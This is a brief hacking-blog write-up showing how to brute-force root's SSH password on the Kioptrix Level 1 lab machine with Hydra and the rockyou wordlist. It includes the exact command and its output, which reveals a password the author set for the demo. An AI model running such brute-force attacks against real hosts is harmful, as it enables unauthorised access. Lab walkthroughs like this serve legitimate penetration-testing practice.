Hacking Blog

Hi folks, ok, another option that we have to break into kioptix level 1, is bruteforce ssh, its quite simple, but takes a LOT of time if you are unlucky. Here is how you can crack down via bruteforce.
In your backtrack type:
cd /pentest/passwords/wordlists/
hydra -l root -P rockyou.txt -t 3 -o login.pwd 172.16.1.144 ssh
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-08-08 13:33:19
[DATA] 3 tasks, 1 server, 14344398 login tries (l:1/p:14344398), ~4781466 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 172.16.1.144   login: root   password: 123456
[STATUS] attack finished for 172.16.1.144 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-08-08 13:33:36


As you can see, it found the pasword 123456 for the user root.

PS : I changed the root password to 123456 for this demonstration only.